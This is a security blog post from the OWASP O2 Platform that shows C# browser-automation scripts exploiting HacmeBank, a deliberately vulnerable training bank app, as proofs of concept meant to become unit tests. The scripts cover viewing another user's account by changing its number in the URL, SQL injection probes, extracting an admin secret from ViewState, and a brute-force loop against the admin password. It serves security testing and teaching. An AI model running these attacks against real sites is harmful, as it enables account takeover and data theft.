OWASP O2 Platform Blog

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank’s vulnerabilities

This code uses O2’s WatiN integration to create an easy ‘IE automation’ scripting environement

Install and confirm we can login

After Installing HacmeBank and run the following script that will confirm if we are logged in:

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();

Vulnerability:User A is able to see User’s B account details

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");

ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
 
ie.link("My Accounts").click();
ie.link("View Transactions").click();  
 
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
 
ie.closeInNSeconds(20);

Vulnerability:Sql Injection in Login page

public void vulnerability_Sql_Injection_in_Login_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}

Vulnerability:Sql Injection in Accounts Details page

[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click(); 
    Browser.open(Browser.url()+"' AAAAA ");            
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();                    
 
    var response = Browser.viewState().ViewState_Values[12];
 
    Browser.field("_ctl3:txtResponse").value(response).flash();           
    Browser.button("Login").flash().click();
}

Script: Fuzzing Admin password

panel.clear();
var topPanel = panel.add_Panel();
 
var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
    (password)=>{
            ie.open(startPage);
            ie.disableFlashing();
            ie.field("txtUserName").value("jv").flash();
                        ie.field("txtPassword").value("jv789").flash();
                        ie.button("Submit").click();
                        ie.link("Admin Section").flash().click();    
            //var secret = ie.viewState().ViewState_Values[12];             
            ie.field("_ctl3:txtResponse", password);
            ie.button("Login").click();
            //Add logic to detect admin Login
        };
 
for(int i =0 ; i < 10 ; i ++)
    adminLogin("admin" + i);       
 
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 - Posted by | HacmeBank, IE Automation, WatiN

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: